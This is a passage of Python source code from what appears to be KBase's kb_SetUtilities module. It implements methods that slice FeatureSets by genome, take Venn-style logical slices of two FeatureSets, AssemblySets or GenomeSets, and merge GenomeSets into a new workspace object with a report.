sorted(this_featureSet['elements'].keys())\n logMsg = 'features in input set {}: {}'.format(featureSet_ref,\n len(this_element_ordering))\n self.log(console, logMsg)\n\n\n # Build sliced FeatureSet\n #\n self.log (console, \"BUILDING SLICED FEATURESET\\n\")\n self.log (console, \"Slicing out genomes \"+(\"\\n\".join(params['input_genome_refs'])))\n element_ordering = []\n elements = {}\n for fId in this_element_ordering:\n feature_hit = False\n genomes_retained = []\n for this_genome_ref in this_featureSet['elements'][fId]:\n genome_hit = False\n\n if this_genome_ref in genome_ref_to_standardized: # The KEY line\n genome_hit = True\n standardized_genome_ref = genome_ref_to_standardized[this_genome_ref]\n elif this_genome_ref in featureSet_genome_ref_to_standardized:\n standardized_genome_ref = featureSet_genome_ref_to_standardized[this_genome_ref]\n if standardized_genome_ref in genome_ref_from_standardized_in_input_flag:\n genome_hit = True\n else: # get standardized genome_ref\n (genome_obj_info,\n genome_obj_name,\n genome_obj_type) = self.get_obj_info(this_genome_ref, 'genome', full_type=True)\n\n acceptable_types = [\"KBaseGenomes.Genome\", \"KBaseMetagenomes.AnnotatedMetagenomeAssembly\"]\n if genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of type: '\" + genome_obj_type +\n \"'. 
Must be one of \" + \", \".join(acceptable_types))\n\n standardized_genome_ref = self.get_obj_ref_from_obj_info(genome_obj_info)\n featureSet_genome_ref_to_standardized[this_genome_ref] = standardized_genome_ref\n if standardized_genome_ref in genome_ref_from_standardized_in_input_flag:\n genome_hit = True\n\n if genome_hit:\n feature_hit = True\n genomes_retained.append(standardized_genome_ref)\n\n if feature_hit:\n element_ordering.append(fId)\n elements[fId] = genomes_retained\n logMsg = 'features in sliced output set: {}'.format(len(element_ordering))\n self.log(console, logMsg)\n\n\n # Save output FeatureSet\n #\n if len(element_ordering) == 0:\n report += 'no features for requested genomes in FeatureSet '+str(featureSet_ref)\n feature_list_lens.append(0)\n else:\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = [featureSet_ref]\n input_ws_obj_refs.extend(params['input_genome_refs'])\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Slice_FeatureSets_by_Genome')\n\n # Store output object\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING FEATURESET\")\n output_FeatureSet = {'description': params['desc'],\n 'element_ordering': element_ordering,\n 'elements': elements}\n\n output_name = params['output_name']\n if len(params['input_featureSet_refs']) > 1:\n output_name += '-' + this_featureSet_obj_name\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseCollections.FeatureSet',\n 'data': output_FeatureSet,\n 'name': output_name,\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n feature_list_lens.append(len(element_ordering))\n objects_created.append({'ref': params['workspace_name'] + '/' + output_name,\n 'description': params['desc']})\n\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n obj_i = -1\n for output_i,list_len in enumerate(feature_list_lens):\n if feature_list_lens[output_i] == 0:\n report += 'No features for requested genomes in featureSet '+str(params['input_featureSet_refs'][output_i])+\"\\n\"\n else:\n obj_i += 1\n report += 'features in output set ' + objects_created[obj_i]['ref'] + ': '\n report += str(feature_list_lens[output_i]) + \"\\n\"\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Slice_FeatureSets_by_Genomes DONE\")\n #END KButil_Slice_FeatureSets_by_Genomes\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Slice_FeatureSets_by_Genomes return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Logical_Slice_Two_FeatureSets(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Logical_Slice_Two_FeatureSets_Params\"\n (KButil_Logical_Slice_Two_FeatureSets() ** ** Method for Slicing\n Two FeatureSets by Venn overlap) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n 
params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_featureSet_ref_A\" of type \"data_obj_ref\",\n parameter \"input_featureSet_ref_B\" of type \"data_obj_ref\",\n parameter \"operator\" of String, parameter \"desc\" of String,\n parameter \"output_name\" of type \"data_obj_name\"\n :returns: instance of type\n \"KButil_Logical_Slice_Two_FeatureSets_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Logical_Slice_Two_FeatureSets\n console = []\n invalid_msgs = []\n self.log(console, 'Running Logical_Slice_Two_FeatureSets with params=')\n self.log(console, \"\\n\" + pformat(params))\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n logMsg = ''\n report = ''\n genome_id_feature_id_delim = \".f:\"\n\n\n # check params\n required_params = ['workspace_name',\n 'operator',\n 'input_featureSet_ref_A',\n 'input_featureSet_ref_B',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Sliced FeatureSet'\n\n\n # Get FeatureSets\n #\n FeatureSet = dict()\n FeatureSet['A'] = dict()\n FeatureSet['B'] = dict()\n input_featureSet_refs = dict()\n input_featureSet_refs['A'] = params['input_featureSet_ref_A']\n input_featureSet_refs['B'] = params['input_featureSet_ref_B']\n input_featureSet_names = dict()\n for set_id in ['A','B']:\n\n (this_featureSet,\n info,\n this_featureSet_obj_name,\n type_name) = self.get_obj_data(input_featureSet_refs[set_id], 'featureSet')\n\n if type_name != 'FeatureSet':\n raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n input_featureSet_names[set_id] = this_featureSet_obj_name\n FeatureSet[set_id] = this_featureSet\n if 'element_ordering' not in list(this_featureSet.keys()):\n FeatureSet[set_id]['element_ordering'] = sorted(this_featureSet['elements'].keys())\n logMsg = 'features in input set {} - {}: {}'.format(set_id,\n this_featureSet_obj_name,\n len(FeatureSet[set_id]['element_ordering']))\n self.log(console, logMsg)\n report += logMsg+\"\\n\"\n \n\n # Store A and B genome + fid hits\n #\n genome_feature_present = dict()\n genome_feature_present['A'] = dict()\n genome_feature_present['B'] = dict()\n featureSet_genome_ref_to_standardized = dict() # must use standardized genome_refs\n\n for set_id in ['A','B']:\n for fId in FeatureSet[set_id]['element_ordering']:\n feature_standardized_genome_refs = []\n for this_genome_ref in FeatureSet[set_id]['elements'][fId]:\n\n if this_genome_ref in featureSet_genome_ref_to_standardized:\n standardized_genome_ref_noVer = featureSet_genome_ref_to_standardized[this_genome_ref]\n else: # get standardized genome_ref\n (genome_obj_info,\n genome_obj_name,\n genome_obj_type) = self.get_obj_info(this_genome_ref, 'genome', full_type=True)\n\n acceptable_types = [\"KBaseGenomes.Genome\", \"KBaseGenomeAnnotations.GenomeAnnotation\",\"KBaseMetagenomes.AnnotatedMetagenomeAssembly\"]\n if genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of 
type: '\" + genome_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n standardized_genome_ref_noVer = '{}/{}'.format(genome_obj_info[WSID_I],\n genome_obj_info[OBJID_I])\n featureSet_genome_ref_to_standardized[this_genome_ref] = standardized_genome_ref_noVer\n feature_standardized_genome_refs.append(standardized_genome_ref_noVer) # standardize list\n combo_id = standardized_genome_ref_noVer + genome_id_feature_id_delim + fId\n genome_feature_present[set_id][combo_id] = True\n self.log(console,\"Set {} contains {}\".format(set_id,combo_id))\n FeatureSet[set_id]['elements'][fId] = feature_standardized_genome_refs\n\n\n # Build sliced FeatureSet\n #\n self.log (console, \"BUILDING SLICED FEATURESET\\n\")\n output_element_ordering = []\n output_elements = dict()\n if params['operator'] == 'yesA_yesB' or params['operator'] == 'yesA_noB':\n input_element_ordering = FeatureSet['A']['element_ordering']\n fwd_set_id = 'A'\n rev_set_id = 'B'\n else:\n input_element_ordering = FeatureSet['B']['element_ordering']\n fwd_set_id = 'B'\n rev_set_id = 'A'\n\n for fId in input_element_ordering:\n feature_hit = False\n genomes_retained = []\n for this_genome_ref_noVer in FeatureSet[fwd_set_id]['elements'][fId]:\n combo_id = this_genome_ref_noVer + genome_id_feature_id_delim + fId\n self.log (console, \"\\t\"+'checking set {} genome+fid: {}'.format(fwd_set_id,combo_id))\n\n if params['operator'] == 'yesA_yesB':\n if genome_feature_present[rev_set_id].get(combo_id):\n feature_hit = True\n genomes_retained.append(this_genome_ref_noVer)\n self.log(console, \"keeping feature {}\".format(combo_id))\n else:\n if not genome_feature_present[rev_set_id].get(combo_id):\n feature_hit = True\n genomes_retained.append(this_genome_ref_noVer)\n self.log(console, \"keeping feature {}\".format(combo_id))\n\n if feature_hit:\n output_element_ordering.append(fId)\n output_elements[fId] = genomes_retained\n logMsg = 'features in sliced output set: {}'.format(len(output_element_ordering))\n self.log(console, logMsg)\n\n\n # Save output FeatureSet\n #\n objects_created = []\n\n # set provenance\n input_ws_obj_refs = [input_featureSet_refs['A'], input_featureSet_refs['B']]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Logical_Slice_Two_FeatureSets')\n\n if len(output_element_ordering) == 0:\n report += 'no features to output under operator '+params['operator']+\"\\n\"\n\n else:\n\n # Store output object\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING FEATURESET\")\n output_FeatureSet = {'description': params['desc'],\n 'element_ordering': output_element_ordering,\n 'elements': output_elements}\n\n output_name = params['output_name']\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseCollections.FeatureSet',\n 'data': output_FeatureSet,\n 'name': output_name,\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n objects_created.append({'ref': params['workspace_name'] + '/' + output_name,\n 'description': params['desc']})\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"features in output set \" + params['output_name'] + \": \"\n + str(len(output_element_ordering)))\n report += 'features in output set ' + params['output_name'] + ': '\n report += str(len(output_element_ordering)) + \"\\n\"\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + 
\"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Logical_Slice_Two_FeatureSets DONE\")\n #END KButil_Logical_Slice_Two_FeatureSets\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Logical_Slice_Two_FeatureSets return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Logical_Slice_Two_AssemblySets(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Logical_Slice_Two_AssemblySets_Params\"\n (KButil_Logical_Slice_Two_AssemblySets() ** ** Method for Slicing\n Two AssemblySets by Venn overlap) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_assemblySet_ref_A\" of type \"data_obj_ref\",\n parameter \"input_assemblySet_ref_B\" of type \"data_obj_ref\",\n parameter \"operator\" of String, parameter \"desc\" of String,\n parameter \"output_name\" of type \"data_obj_name\"\n :returns: instance of type\n \"KButil_Logical_Slice_Two_AssemblySets_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Logical_Slice_Two_AssemblySets\n console = []\n invalid_msgs = []\n self.log(console, 'Running Logical_Slice_Two_AssemblySets with params=')\n self.log(console, \"\\n\" + pformat(params))\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n logMsg = ''\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'operator',\n 'input_assemblySet_ref_A',\n 'input_assemblySet_ref_B',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Sliced AssemblySet'\n\n\n # Get AssemblySets\n #\n AssemblySet = dict()\n AssemblySet['A'] = dict()\n AssemblySet['B'] = dict()\n input_assemblySet_refs = dict()\n input_assemblySet_refs['A'] = params['input_assemblySet_ref_A']\n input_assemblySet_refs['B'] = params['input_assemblySet_ref_B']\n input_assemblySet_names = dict()\n for set_id in ['A','B']:\n\n (this_assemblySet,\n info,\n this_assemblySet_obj_name,\n type_name) = self.get_obj_data(input_assemblySet_refs[set_id], 'assemblySet')\n\n if type_name != 'AssemblySet':\n raise ValueError(\"Bad Type: Should be AssemblySet instead of '\" + type_name + \"'\")\n\n input_assemblySet_names[set_id] = this_assemblySet_obj_name\n AssemblySet[set_id] = this_assemblySet\n logMsg = 'assemblies in input set {} - {}: {}'.format(set_id,\n this_assemblySet_obj_name,\n len(AssemblySet[set_id]['items']))\n self.log(console, logMsg)\n report += logMsg+\"\\n\"\n \n\n # Store 
A and B assemblies\n #\n assembly_obj_present = dict()\n assembly_obj_present['A'] = dict()\n assembly_obj_present['B'] = dict()\n assembly_ref_to_standardized = dict() # must use standardized assembly_refs\n\n for set_id in ['A','B']:\n new_items = []\n for item in AssemblySet[set_id]['items']:\n standardized_assembly_refs = []\n this_assembly_ref = item['ref']\n \n if this_assembly_ref in assembly_ref_to_standardized:\n standardized_assembly_ref_noVer = assembly_ref_to_standardized[this_assembly_ref]\n else: # get standardized assembly_ref\n (assembly_obj_info,\n assembly_obj_name,\n assembly_obj_type) = self.get_obj_info(this_assembly_ref, 'assembly', full_type=True)\n\n acceptable_types = [\"KBaseGenomeAnnotations.Assembly\"]\n if assembly_obj_type not in acceptable_types:\n raise ValueError(\"Input Assembly of type: '\" + assembly_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n standardized_assembly_ref_noVer = '{}/{}'.format(assembly_obj_info[WSID_I],\n assembly_obj_info[OBJID_I])\n assembly_ref_to_standardized[this_assembly_ref] = standardized_assembly_ref_noVer\n standardized_assembly_refs.append(standardized_assembly_ref_noVer) # standardize list\n assembly_obj_present[set_id][standardized_assembly_ref_noVer] = True\n new_items.append({'ref':standardized_assembly_ref_noVer,'label':item['label']})\n self.log(console,\"Set {} contains {}\".format(set_id,standardized_assembly_ref_noVer))\n AssemblySet[set_id]['items'] = new_items\n\n\n # Build sliced AssemblySet\n #\n self.log (console, \"BUILDING SLICED ASSEMBLYSET\")\n output_items = []\n if params['operator'] == 'yesA_yesB' or params['operator'] == 'yesA_noB':\n input_items = AssemblySet['A']['items']\n fwd_set_id = 'A'\n rev_set_id = 'B'\n else:\n input_items = AssemblySet['B']['items']\n fwd_set_id = 'B'\n rev_set_id = 'A'\n\n for item in input_items:\n self.log (console, 'checking assembly {} from set {}'.format(item['ref'],fwd_set_id))\n this_standardized_assembly_ref_noVer = item['ref']\n if params['operator'] == 'yesA_yesB':\n if assembly_obj_present[rev_set_id].get(this_standardized_assembly_ref_noVer):\n self.log(console, \"keeping assembly {}\".format(item['ref']))\n output_items.append(item)\n else:\n if not assembly_obj_present[rev_set_id].get(this_standardized_assembly_ref_noVer):\n self.log(console, \"keeping assembly {}\".format(item['ref']))\n output_items.append(item)\n logMsg = 'assemblies in sliced output set: {}'.format(len(output_items))\n self.log(console, logMsg)\n\n\n # Save output AssemblySet\n #\n objects_created = []\n\n if len(output_items) == 0:\n report += 'no assemblies to output under operator '+params['operator']+\"\\n\"\n else:\n if params.get('desc'):\n output_desc = params['desc']\n else:\n output_desc = 'Venn slice '+params['operator']+' of AssemblySets '+input_assemblySet_names['A']+' and '+input_assemblySet_names['B']\n output_assemblySet_obj = { 'description': output_desc,\n 'items': output_items\n }\n output_assemblySet_name = params['output_name']\n try:\n output_assemblySet_ref = self.setAPI_Client.save_assembly_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_assemblySet_name,\n 'data': output_assemblySet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save assembly set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(output_items) > 0:\n self.log(console, \"assemblies in output set 
\" + params['output_name'] + \": \"\n + str(len(output_items)))\n report += 'assemblies in output set ' + params['output_name'] + ': '\n report += str(len(output_items)) + \"\\n\"\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Logical_Slice_Two_AssemblySets DONE\")\n #END KButil_Logical_Slice_Two_AssemblySets\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Logical_Slice_Two_AssemblySets return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Logical_Slice_Two_GenomeSets(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Logical_Slice_Two_GenomeSets_Params\"\n (KButil_Logical_Slice_Two_GenomeSets() ** ** Method for Slicing\n Two AssemblySets by Venn overlap) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_genomeSet_ref_A\" of type \"data_obj_ref\",\n parameter \"input_genomeSet_ref_B\" of type \"data_obj_ref\",\n parameter \"operator\" of String, parameter \"desc\" of String,\n parameter \"output_name\" of type \"data_obj_name\"\n :returns: instance of type\n \"KButil_Logical_Slice_Two_GenomeSets_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Logical_Slice_Two_GenomeSets\n console = []\n invalid_msgs = []\n self.log(console, 'Running Logical_Slice_Two_GenomeSets with params=')\n self.log(console, \"\\n\" + pformat(params))\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n logMsg = ''\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'operator',\n 'input_genomeSet_ref_A',\n 'input_genomeSet_ref_B',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Sliced GenomeSet'\n\n\n # Get GenomeSets\n #\n GenomeSet_element_refs = dict()\n input_genomeSet_refs = dict()\n input_genomeSet_refs['A'] = params['input_genomeSet_ref_A']\n input_genomeSet_refs['B'] = params['input_genomeSet_ref_B']\n input_genomeSet_names = dict()\n for set_id in ['A','B']:\n\n (this_genomeSet,\n info,\n this_genomeSet_obj_name,\n type_name) = self.get_obj_data(input_genomeSet_refs[set_id], 'genomeSet')\n\n input_genomeSet_names[set_id] = this_genomeSet_obj_name;\n\n if type_name != 'GenomeSet':\n raise ValueError(\"Bad Type: Should be GenomeSet instead of '\" + type_name + \"'\")\n\n GenomeSet_element_refs[set_id] = []\n for genome_id in 
sorted(this_genomeSet['elements'].keys()):\n GenomeSet_element_refs[set_id].append(this_genomeSet['elements'][genome_id]['ref'])\n logMsg = 'genomes in input set {} - {}: {}'.format(set_id,\n this_genomeSet_obj_name,\n len(GenomeSet_element_refs[set_id]))\n self.log(console, logMsg)\n report += logMsg+\"\\n\"\n\n\n # Store A and B genome + fid hits\n #\n genome_obj_present = dict()\n genome_obj_present['A'] = dict()\n genome_obj_present['B'] = dict()\n genome_ref_to_standardized = dict() # must use standardized genome_refs\n\n for set_id in ['A','B']:\n new_element_refs = []\n for this_genome_ref in GenomeSet_element_refs[set_id]:\n standardized_genome_refs = []\n \n if this_genome_ref in genome_ref_to_standardized:\n standardized_genome_ref_noVer = genome_ref_to_standardized[this_genome_ref]\n else: # get standardized genome_ref\n (genome_obj_info,\n genome_obj_name,\n genome_obj_type) = self.get_obj_info(this_genome_ref, 'genome', full_type=True)\n\n acceptable_types = [\"KBaseGenomes.Genome\",\"KBaseGenomeAnnotations.GenomeAnnotation\"]\n if genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of type: '\" + genome_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n standardized_genome_ref_noVer = '{}/{}'.format(genome_obj_info[WSID_I],\n genome_obj_info[OBJID_I])\n genome_ref_to_standardized[this_genome_ref] = standardized_genome_ref_noVer\n standardized_genome_refs.append(standardized_genome_ref_noVer) # standardize list\n genome_obj_present[set_id][standardized_genome_ref_noVer] = True\n new_element_refs.append(standardized_genome_ref_noVer)\n self.log(console,\"Set {} contains {}\".format(set_id,standardized_genome_ref_noVer))\n GenomeSet_element_refs[set_id] = new_element_refs\n\n\n # Build sliced GenomeSet\n #\n self.log (console, \"BUILDING SLICED GENOMESET\")\n output_items = []\n if params['operator'] == 'yesA_yesB' or params['operator'] == 'yesA_noB':\n input_element_refs = GenomeSet_element_refs['A']\n fwd_set_id = 'A'\n rev_set_id = 'B'\n else:\n input_element_refs = GenomeSet_element_refs['B']\n fwd_set_id = 'B'\n rev_set_id = 'A'\n\n for this_standardized_genome_ref_noVer in input_element_refs:\n self.log (console, 'checking set {} genome {}'.format(set_id,this_standardized_genome_ref_noVer))\n if params['operator'] == 'yesA_yesB':\n if genome_obj_present[rev_set_id].get(this_standardized_genome_ref_noVer):\n output_items.append(this_standardized_genome_ref_noVer)\n self.log(console, \"keeping genome {}\".format(this_standardized_genome_ref_noVer))\n else:\n if not genome_obj_present[rev_set_id].get(this_standardized_genome_ref_noVer):\n output_items.append(this_standardized_genome_ref_noVer)\n self.log(console, \"keeping genome {}\".format(this_standardized_genome_ref_noVer))\n logMsg = 'genomes in sliced output set: {}'.format(len(output_items))\n self.log(console, logMsg)\n\n\n # Save output GenomeSet\n #\n objects_created = []\n\n # set provenance\n input_ws_obj_refs = [input_genomeSet_refs['A'], input_genomeSet_refs['B']]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Logical_Slice_Two_GenomeSets')\n\n if len(output_items) == 0:\n report += 'no genomes to output under operator '+params['operator']+\"\\n\"\n else:\n # KBaseSearch.GenomeSet form is a dict of elements, not a list of items\n output_elements = dict();\n for genome_ref in sorted(output_items):\n output_elements[genome_ref] = {'ref':genome_ref}\n \n if params.get('desc'):\n output_desc = params['desc']\n else:\n output_desc = 
'Venn slice '+params['operator']+' of GenomeSets '+input_genomeSet_names['A']+' and '+input_genomeSet_names['B']\n output_genomeSet_obj = { 'description': output_desc,\n 'elements': output_elements\n }\n output_genomeSet_name = params['output_name']\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseSearch.GenomeSet',\n 'data': output_genomeSet_obj,\n 'name': output_genomeSet_name,\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n objects_created.append({'ref': params['workspace_name'] + '/' + output_genomeSet_name,\n 'description': output_desc})\n\n \n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(output_items) > 0:\n self.log(console, \"assemblies in output set \" + params['output_name'] + \": \"\n + str(len(output_items)))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(output_items)) + \"\\n\"\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Logical_Slice_Two_GenomeSets DONE\")\n #END KButil_Logical_Slice_Two_GenomeSets\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Logical_Slice_Two_GenomeSets return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Merge_GenomeSets(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Merge_GenomeSets_Params\"\n (KButil_Merge_GenomeSets() ** ** Method for merging GenomeSets)\n -> structure: parameter \"workspace_name\" of type \"workspace_name\"\n (** The workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. 
This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Merge_GenomeSets_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Merge_GenomeSets\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Merge_GenomeSets with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Merged GenomeSet'\n\n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 2:\n self.log(console, \"Must provide at least two GenomeSets\")\n self.log(invalid_msgs, \"Must provide at least two GenomeSets\")\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = params['input_refs']\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Merge_GenomeSets')\n\n # Build GenomeSet\n #\n elements = dict()\n\n # Add Genomes from GenomeSets\n for input_genomeset_ref in params['input_refs']:\n\n (genomeSet,\n info,\n this_genomeSet_obj_name,\n type_name) = self.get_obj_data(input_genomeset_ref, 'genomeSet')\n\n if type_name != 'GenomeSet':\n raise ValueError(\"Bad Type: Should be GenomeSet instead of '\" + type_name + \"'\")\n\n for gId in list(genomeSet['elements'].keys()):\n old_genomeRef = genomeSet['elements'][gId]['ref']\n (this_obj_info,\n this_obj_name,\n this_obj_type) = self.get_obj_info(old_genomeRef, 'genome')\n\n standardized_genomeRef = self.get_obj_ref_from_obj_info_noVer(this_obj_info)\n new_gId = standardized_genomeRef\n if not elements.get(new_gId):\n elements[new_gId] = dict()\n elements[new_gId]['ref'] = standardized_genomeRef # the key line\n self.log(console, \"adding element \" + new_gId + \" : \" + standardized_genomeRef)\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING GENOMESET\")\n output_GenomeSet = {'description': params['desc'],\n 'elements': elements\n }\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{'type': 'KBaseSearch.GenomeSet',\n 'data': output_GenomeSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance\n }]\n })[0]\n \n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"genomes in output set \" + params['output_name'] + \": \" +\n str(len(list(elements.keys()))))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(list(elements.keys()))) + \"\\n\"\n ref = params['workspace_name'] + '/' + params['output_name']\n reportObj = {'objects_created': [{'ref': ref,\n 'description': 'KButil_Merge_GenomeSets'}],\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n 
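# on validation failure, no output objects are created; the report carries the accumulated messages\n            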
